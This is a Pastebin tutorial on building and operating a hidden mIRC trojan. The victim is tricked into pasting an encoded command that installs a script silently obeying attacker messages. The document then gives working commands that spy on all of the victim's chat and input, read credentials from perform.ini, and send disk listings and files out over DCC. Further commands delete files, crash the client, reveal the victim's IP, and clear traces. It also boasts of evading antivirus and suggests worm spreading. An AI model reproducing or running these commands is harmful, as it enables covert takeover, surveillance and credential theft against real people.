Advertisement
neo71

Tutorial IRC trojan

Dec 20th, 2014
208
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.24 KB | None | 0 0
  1. 1) Infect the victim
  2.  
  3.  
  4.  
  5. The Trojan can be activated by the victim when he writes the next command:
  6.  
  7.  
  8.  
  9. //write czm.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IGhhbHRkZWYgfQ==,m) | .load -rs czm.mrc |
  10. msg YOURNICK i love you
  11.  
  12.  
  13.  
  14. YOURNICK = your nick. The victim will message you 'I love you' once he writes the command. You can edit it or just delete
  15. the ' | msg YOURNICK I love you ' part.
  16.  
  17.  
  18.  
  19. This is what the command does: it will make a new .mrc file czm and put this in it (which is encoded in the command): on
  20. ^*:text:ins*:?:{ . $+ $2- | haltdef }
  21.  
  22. The haltdef will block your messages to the victim beginning with 'ins'. With this the user can’t see your commands, so he
  23. wont have a clue who is controlling his mIRC.
  24.  
  25. Example:
  26.  
  27. /msg victim ins msg #channel hi
  28.  
  29. This will let the victim message #channel the 'hi' message, but the victim will NOT see it, all others in the channel will see.
  30. And the victim will not see your message 'ins msg #channel hi' because it will be blocked by 'haltdef'. Nice isn’t it? J
  31.  
  32.  
  33.  
  34. When the victim has executed that command the Trojan is active. You can add a spy function if you want (this can cause
  35. him an excess flood if he is on too much 'popular' channels (channel with much activity). For adding the spy part (it will send
  36. you all his activity, messages received, message sent and commands executed) execute the next commands:
  37.  
  38.  
  39.  
  40. 2) Spy the victim:
  41.  
  42. /msg victim ins write -c myscript.mrc
  43.  
  44. /msg victim ins unload -rs myscript.mrc
  45.  
  46. /msg victim insert write -c myscript.mrc on *:CONNECT: { .msg YOURNICK i am online }
  47.  
  48. /msg victim ins write myscript.mrc on *:TEXT:*:*: { .msg YOURNICK $timestamp <- < $+ $iif($chan,# $+ :,$+ ) $+ $nick $+ >
  49. $1- }
  50.  
  51. /msg victim ins write myscript.mrc on *:INPUT:*: { .msg YOURNICK $timestamp -> $iif($left($1,1) != /,< $+ $me $+
  52. >,[COMMAND]) $1- }
  53.  
  54. /msg victim ins load -rs myscript.mrc
  55.  
  56.  
  57.  
  58. Once done that, you’ll receive the msgs immediately. You can let the spy function stop by typing the next command:
  59.  
  60.  
  61.  
  62. /msg victim ins unload -rs myscript.mrc
  63.  
  64.  
  65.  
  66. Note: victim = the nick of the victim who has executed that command, and who has the Trojan.
  67.  
  68.  
  69.  
  70. 3) Make other remote files (.mrc)
  71.  
  72. You can make remote files yourself and add usefull functions in it.
  73.  
  74. /msg victim insert write -c YOURSCRIPTNAME.mrc on 1:TEXT:*!opme*:#CHANNEL:/mode #channel +o $nick
  75.  
  76. /msg victim ins .load –rs YOURSCRIPTNAMEt.mrc
  77.  
  78.  
  79.  
  80. 4) Use of the Trojan:
  81.  
  82. Well this is limited, but this is the main basic: you can make commands yourself, I’ll try to make more advanced commands
  83. later J
  84.  
  85.  
  86.  
  87. REMOVE FILE :
  88.  
  89. /msg victim ins remove C:\Textfile.txt
  90.  
  91.  
  92.  
  93. OPEN SITE:
  94.  
  95. /msg victim ins url www.site.com
  96.  
  97.  
  98.  
  99. JOIN CHANNEL:
  100.  
  101. /msg victim ins join #channel
  102.  
  103.  
  104.  
  105. PART CHANNEL:
  106.  
  107. /msg victim ins part #channel
  108.  
  109.  
  110.  
  111. QUERY USER:
  112.  
  113. /msg victim ins query user
  114.  
  115.  
  116.  
  117. MSG USER:
  118.  
  119. /msg victim ins msg user
  120.  
  121.  
  122.  
  123. INVITE USER:
  124.  
  125. /msg victim ins invite user #channel
  126.  
  127.  
  128.  
  129. BAN USER:
  130.  
  131. /msg victim ins ban #channel user
  132.  
  133.  
  134.  
  135. KICK USER:
  136.  
  137. /msg victim ins kick #channel user
  138.  
  139.  
  140.  
  141. IGNORE USER:
  142.  
  143. /msg victim ins ignore *!*@host.com
  144.  
  145.  
  146.  
  147. UNIGNORE USER:
  148.  
  149. /msg victim ins unignore *!*@host.com
  150.  
  151.  
  152.  
  153. CHANGE NICK:
  154.  
  155. /msg victim ins nick thenickyouwant
  156.  
  157.  
  158.  
  159. OP USER:
  160.  
  161. /msg victim ins mode #channel +o user
  162.  
  163.  
  164.  
  165. VOICE USER:
  166.  
  167. /msg victim ins mode #channel +v user
  168.  
  169.  
  170.  
  171. CHANGE TOPIC:
  172.  
  173. /msg victim ins topic #channel text
  174.  
  175.  
  176.  
  177. RECEIVE FILE:
  178.  
  179. /msg victim ins dcc send user file
  180.  
  181. or
  182.  
  183. /msg victim ins dcc send user C:\something.sth
  184.  
  185.  
  186.  
  187. EDIT TEXT:
  188.  
  189. /msg victim ins write -l1 C:\TESTING.txt thetextyouwanttoedit
  190.  
  191. (-l1 --> first line)
  192.  
  193.  
  194.  
  195. READ A PIECE OF FILE (LIKE PERFORM):
  196.  
  197. following commands must be executed after eachother:
  198.  
  199. /msg victim ins write mab alias abcd123 { msg user $read(perform.ini,w,*auth*) }
  200.  
  201. /msg victim ins .load -rs mab
  202.  
  203. /msg victim ins abcd123
  204.  
  205.  
  206.  
  207. SEARCH HARD DISK FOR A FILE:
  208.  
  209. /msg victim ins write MAB1 alias MAB1 { .echo $findfile(C:\,porn.*,0,msg user $1-) }
  210.  
  211. /msg victim ins .load -rs MAB1
  212.  
  213. /msg victim ins MAB1
  214.  
  215.  
  216.  
  217. LET HIS mIRC CRASH:
  218.  
  219. /msg victim ins write MAB2 alias MAB2 { while (1 != 2) { beep } }
  220.  
  221. /msg victim ins .load -rs MAB2
  222.  
  223. /msg victim ins MAB2
  224.  
  225.  
  226.  
  227. SCAN HIS HARD DISK AND SAVE IT AS .txt:
  228.  
  229. //echo $findfile(c:,*.*,0,write C:\M_A_B.txt $1-)
  230.  
  231.  
  232.  
  233. Note: Probably you want this file, well you do this:
  234.  
  235. /msg victim ins dcc send YOURNICK C:\M_A_B.txt
  236.  
  237. ** Important note **
  238.  
  239. The victim will see the send dialog, so act quick, for security reasons i suggest to write another trojan on another file; like:
  240.  
  241. /msg victim write MyNewScript.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IGhhbHRkZWYgfQ==,m) |
  242. .load -rs MyNewScript.mrc
  243.  
  244.  
  245.  
  246. FIND THE VICTIMs IP WHEN HE USES A MASK:
  247.  
  248. /msg victim ins //msg YOURNICK $ip
  249.  
  250.  
  251.  
  252. FIND THE VICTIMs HOST WHEN HE USES A MASK:
  253.  
  254. /msg victim ins //msg YOURNICK $host
  255.  
  256.  
  257.  
  258. FIND THE VICTIMs OS:
  259.  
  260. /msg victim ins //msg YOURNICK $os
  261.  
  262.  
  263.  
  264. FIND OUT ON WHICH SERVER THE VICTIM IS LOCATED:
  265.  
  266. /msg victim ins //msg YOURNICK $server
  267.  
  268.  
  269.  
  270. FIND OUT WHAT THE REAL TIME ON THE VICTIMs PC IS:
  271.  
  272. /msg victim ins //msg YOURNICK $time
  273.  
  274.  
  275.  
  276. FIND OUT WHAT THE REAL DATE ON THE VICTIMs PC IS:
  277.  
  278. /msg victim ins //msg YOURNICK $date
  279.  
  280.  
  281.  
  282. FIND OUT OF THE VICTIM IS AWAY
  283.  
  284. /msg victim ins //msg YOURNICK $away
  285.  
  286.  
  287.  
  288. FIND OUT THE IP OF THE SERVER THE VICTIM IS ON:
  289.  
  290. /msg victim ins //msg YOURNICK $serverIP
  291.  
  292.  
  293.  
  294. FIND OUT ON WHAT URLs THE VICTIM IS ON AT THE MOMENT:
  295.  
  296. /msg victim ins //msg YOURNICK $url
  297.  
  298.  
  299.  
  300. FIND OUT WHAT THE REAL mIRC VERSION THE VICTIM HAS:
  301.  
  302. /msg victim ins //msg YOURNICK $victim
  303.  
  304.  
  305.  
  306. TURN THE AUTO JOIN ON INVITE ON (or OFF)
  307.  
  308. /msg victim ins ajinvite on
  309.  
  310.  
  311.  
  312. LET THE VICTIM MESSAGE SOMETHING ON ALL THE CHANNELS HE IS ON:
  313.  
  314. /msg victim ins amsg <the message you want him to say on all channels>
  315.  
  316.  
  317.  
  318. CHANGE THE VICTIMs ALTERNATIVE NICK:
  319.  
  320. /msg victim ins anick <nickname>
  321.  
  322.  
  323.  
  324. CHANGE THE VICTIMs BACKGROUND PICTURE:
  325.  
  326. /msg victim ins background [-aemsgdluhcfnrtpx] [window] [filename]
  327.  
  328. with
  329.  
  330. -a = active window
  331.  
  332. -m = main mIRC window
  333.  
  334. -s = status window
  335.  
  336. -g = finger window
  337.  
  338. -d = single message window
  339.  
  340.  
  341.  
  342. -e = set as default
  343.  
  344.  
  345.  
  346. -cfnrtp = center, fill, normal, stretch, tile, photo
  347.  
  348.  
  349.  
  350. -l = toolbar
  351.  
  352. -u = toolbar buttons
  353.  
  354. -h = switchbar
  355.  
  356.  
  357.  
  358. -x = no background picture
  359.  
  360.  
  361.  
  362. LET THE "mIRC CHANNEL CENTRAL" OF A CHANNEL POP UP:
  363.  
  364. /msg victim ins channel #CHANNELNAME
  365.  
  366. Note: the victim must be on #CHANNELNAME
  367.  
  368.  
  369.  
  370. CLEAR YOUR TRACKS BY CLEARING THE TEXT ON THE OPEN WINDOWS:
  371.  
  372. /msg victim ins clearall [-snqmtgu]
  373.  
  374. s = status, n = channel, q = query, m = message window, t = chat, g = finger, u = custom.
  375.  
  376.  
  377.  
  378. LET THE VICTIM CLIPBOARD A SPECIFIED TEXT:
  379.  
  380. /msg victim ins clipboard <the text you want to be clipboarded>
  381.  
  382.  
  383.  
  384. CLOSE THE OPEN QUERIES OF THE VICTIM:
  385.  
  386. /msg victim ins close
  387.  
  388.  
  389.  
  390. LET THE VICTIM QUIT mIRC:
  391.  
  392. /msg victim ins quit <the quit message you want>
  393.  
  394.  
  395.  
  396. LET THE VICTIM DISCONNECT FROM SERVER:
  397.  
  398. /msg victim ins disconnect
  399.  
  400.  
  401.  
  402. LET THE VICTIM CHANGE SERVER:
  403.  
  404. /msg victim ins server the.server.you.want
  405.  
  406.  
  407.  
  408. LET THE VICTIM OPEN A NEW SERVER NEXT TO THE SERVER HE IS ALREADY IN:
  409.  
  410. /msg victim ins server -m
  411.  
  412. /msg victim ins server the.server.you.want
  413.  
  414.  
  415.  
  416. LET THE VICTIM GIVE YOU FLAGS (if he is able to):
  417.  
  418. /msg victim ins msg |TheBot| chanlev #channel YOURNICK +flag
  419.  
  420. Note:
  421.  
  422. |TheBot| = the bot who can give flags
  423.  
  424. Chanlev = can be different, sometimes it is also, "adduser"
  425.  
  426. flag = the flag you want
  427.  
  428. YOURNICK = your nick
  429.  
  430.  
  431.  
  432. CHANGE THE VICTIMs FONT AND FONT SIZE:
  433.  
  434. /msg victim ins font -asgbd <fontsize> <fontname>
  435.  
  436.  
  437.  
  438. CHANGE THE VICTIMs FULL NAME:
  439.  
  440. /msg victim ins fullname <name>
  441.  
  442.  
  443.  
  444. LET THE VICTIM REJOIN A CHANNEL:
  445.  
  446. /msg victim ins hop #CHANNEL
  447.  
  448.  
  449.  
  450. MAKE A NEW DIRECTORY ON THE VICITMs HARD DISK:
  451.  
  452. /msg victim ins mkdir <dirname>
  453.  
  454.  
  455.  
  456. NOTE:
  457.  
  458. victim = nick of the victim
  459.  
  460. user = your nick
  461.  
  462. 5) Additional Information: this trojan is NOT detectable by any virus scanner, since its a code in mIRC... And remember that
  463. you dont need a file to send to the victim, the victim will make (write) a file by executing that command. If you want to let it
  464. spread by an IRC worm, i would suggest that you used a bot...
  465.  
  466. by NE0
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement